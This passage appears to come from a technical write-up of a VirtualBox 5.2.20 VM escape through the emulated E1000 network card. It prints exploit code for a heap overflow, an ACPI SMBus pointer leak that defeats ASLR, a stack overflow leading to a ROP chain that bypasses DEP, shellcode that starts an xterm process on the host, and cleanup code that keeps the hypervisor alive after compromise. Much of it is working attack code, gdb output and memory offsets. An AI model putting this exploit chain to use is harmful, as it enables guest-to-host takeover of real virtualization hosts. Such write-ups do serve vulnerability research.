pThis->u8SMBusBlkIdx++;
pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
break;
...
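When the guest executes INB(0x4107) to read one byte from the port, the handler takes one byte from the au8SMBusBlkDat[32] array at index u8SMBusBlkIdx and returns it to the guest. This is where the write primitive comes in: because the distances between virtual device heap blocks are constant, the distance from the EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx is constant too. By writing two bytes over ACPIState.u8SMBusBlkIdx we can read arbitrary data within 255 bytes of ACPIState.au8SMBusBlkDat.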
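The order of operations in the handler is what makes the out-of-range read possible: the byte is fetched first and the index is masked only afterwards. The model below is a sketch with hypothetical names (`acpi_model_t`, `smbus_blk_read`); its 256-byte `mem` array stands in for the 32-byte block buffer together with the bytes that follow it, so the model never leaves its own storage.

```c
#include <assert.h>
#include <stdint.h>

#define BLK_SIZE 32u

typedef struct {
    uint8_t mem[256]; /* mem[0..31] models au8SMBusBlkDat, the rest the bytes after it */
    uint8_t idx;      /* models u8SMBusBlkIdx */
} acpi_model_t;

static uint8_t smbus_blk_read(acpi_model_t *a)
{
    assert(a != 0);
    uint8_t v = a->mem[a->idx]; /* the read uses the index before it is masked */
    a->idx++;
    a->idx &= BLK_SIZE - 1;     /* only now is the index wrapped into range */
    return v;
}
```

A single read with a planted index therefore returns one out-of-range byte, after which the index is back inside the array; this is why the exploit rewrites the index before every byte it leaks.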
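Looking at the ACPIState structure again, the array sits at the end of the structure and the remaining fields are of little use to leak, so let's look at what lies past the structure: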
gef➤ x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0: 0xffffe98100000090 0xfffd9b2000000000
0x7fc47008d4f0: 0x00007fc470067a00 0x00007fc470067a00
0x7fc47008d500: 0x00000000a0028a00 0x00000000000e0000
0x7fc47008d510: 0x00000000000e0fff 0x0000000000001000
0x7fc47008d520: 0x000000ff00000002 0x0000100000000000
0x7fc47008d530: 0x00007fc47008c358 0x00007fc44d6ecdc6
0x7fc47008d540: 0x0031000035944000 0x00000000000002b8
0x7fc47008d550: 0x00280001d3878000 0x0000000000000000
gef➤ x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6: "ACPI RSDP"
gef➤ vmmap VBoxDD.so
Start End Offset Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤ p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6
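There is a pointer to a string located at a fixed offset from the VBoxDD.so image base; the pointer sits at offset 0x58 past the end of ACPIState. We can read it byte by byte and obtain the VBoxDD.so image base. This relies on the data past the ACPIState structure not changing from one VM boot to the next.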
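Turning eight leaked bytes into an image base is a little-endian reassembly followed by one subtraction. The sketch below uses the pointer and offset from the gdb session above; `LEAKED_RVA`, `assemble_le64` and `image_base` are hypothetical names, and the RVA is specific to that particular build of VBoxDD.so.

```c
#include <assert.h>
#include <stdint.h>

#define LEAKED_RVA 0x1f9dc6ULL /* offset printed by gdb above; build-specific */

/* Rebuild a 64-bit value from bytes leaked in ascending address order. */
static uint64_t assemble_le64(const uint8_t b[8])
{
    assert(b != 0);
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | b[i];
    return v;
}

/* The image base is the leaked pointer minus its fixed offset in the library. */
static uint64_t image_base(uint64_t leaked_ptr)
{
    return leaked_ptr - LEAKED_RVA;
}
```

Assembling the bytes explicitly avoids casting a byte array to `uint64_t *`, which keeps the computation independent of alignment and aliasing rules. For the session above, the bytes c6 cd 6e 4d c4 7f 00 00 yield the pointer 0x00007fc44d6ecdc6 and the base 0x00007fc44d4f3000, matching the vmmap output.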
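Information leak
Now we combine the write and read primitives to bypass ASLR. We overflow the heap to overwrite the EEPROM93C46 structure, trigger an EEPROM write that stores the index into the ACPIState structure, and execute INB(0x4107) in the guest so that ACPI returns one byte of the pointer. This is done 8 times, incrementing the index by 1 each time.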
uint64_t stage_1_main(void* mmio, void* tx_ring) {
printk(KERN_INFO PFX"##### Stage 1 #####\n");
// When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor
// is sent back to the guest and handled right now via e1kHandleRxPacket.
// When loopback mode is disabled data is sent to a network as usual.
// We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
// in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and
// the stack buffer.
e1000_disable_loopback_mode(mmio);
uint8_t leaked_bytes[8];
uint32_t i;
for (i = 0; i < 8; i++) {
stage_1_overflow_heap_buffer(mmio, tx_ring, i);
leaked_bytes[i] = stage_1_leak_byte();
printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
}
uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);
return vboxdd_base;
}
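In loopback mode the guest sends packets back to itself, so they are received immediately after being sent. With this mode disabled, e1kHandleRxPacket is unreachable.
DEP
With ASLR bypassed, we can enable loopback mode and trigger the stack buffer overflow.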
void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
off_t buffer_pa;
void* buffer_va;
alloc_buffer(&buffer_pa, &buffer_va);
stage_2_set_up_buffer(buffer_va, vboxdd_base);
stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);
free_buffer(buffer_va);
}
void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
printk(KERN_INFO PFX"##### Stage 2 #####\n");
e1000_enable_loopback_mode(mmio);
stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
e1000_disable_loopback_mode(mmio);
}
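When the last instruction of e1kHandleRxPacket executes, the saved return address has been overwritten and the attacker can transfer control to any address. DEP still has to be bypassed, which is done by building a ROP chain.
Shellcode
The shellcode loader is simple: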
use64
start:
lea rsi, [rsp - 0x4170];
push rax
pop rdi
add rdi, loader_size
mov rcx, 0x800
rep movsb
nop
payload:
; Here the shellcode is to be
loader_size = $ - start
Once the shellcode runs, its first part is:
use64
start:
; sys_fork
mov rax, 58
syscall
test rax, rax
jnz continue_process_execution
; Initialize argv
lea rsi, [cmd]
mov [argv], rsi
; Initialize envp
lea rsi, [env]
mov [envp], rsi
; sys_execve
lea rdi, [cmd]
lea rsi, [argv]
lea rdx, [envp]
mov rax, 59
syscall
...
cmd db '/usr/bin/xterm', 0
env db 'DISPLAY=:0.0', 0
argv dq 0, 0
envp dq 0, 0
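It uses fork and execve to create a /usr/bin/xterm process, which gives the attacker control in ring 3.
Process continuation
The goal is not a DoS: the hypervisor should keep running after exploitation. The second part of the shellcode takes care of that: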
continue_process_execution:
; Restore RBP
mov rbp, rsp
add rbp, 0x48
; Skip junk
add rsp, 0x10
; Restore the registers that must be preserved according to System V ABI
pop rbx
pop r12
pop r13
pop r14
pop r15
; Skip junk
add rsp, 0x8
; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After: "E1000-Xmit" -> NULL
; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
; This was unnecessary on my testing machines but to be sure...
mov rdi, [rbx]
mov rax, 0x0
mov rcx, 0xA0
rep stosb
; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1")
; will be corrupted in MMHyperFree
mov qword [rbx], 0x0
; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted
ret
When e1kHandleRxPacket is called, the call stack is:
#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...
Execution then jumps to e1kR3NetworkDown_XmitPending, which does nothing further and returns into the hypervisor.
static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
/* Resume suspended transmission */
STATUS &= ~STATUS_TXOFF;
e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}
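The shellcode sets RBP to RSP + 0x48 so that it holds the value expected in e1kR3NetworkDown_XmitPending. Then RBX, R12, R13, R14 and R15 are popped from the stack: the System V ABI requires a callee to preserve them, and without restoring them the hypervisor would crash.
That is almost all: the VM does not crash and keeps running. When the VM is shut down, however, an access violation occurs in PDMR3QueueDestroyDevice, because a PDMQUEUE structure is overwritten by the heap overflow (and by the ROP chain data). This problem is harder to fix than it looks.
The overwritten structure is a linked list. According to the comments in the shellcode, the corrupted field is the pointer to "Mouse_1" stored at the start of "E1000-Rcv", near the end of the list.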
; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After: "E1000-Xmit" -> NULL
With the last two elements dealt with, the VM shuts down normally.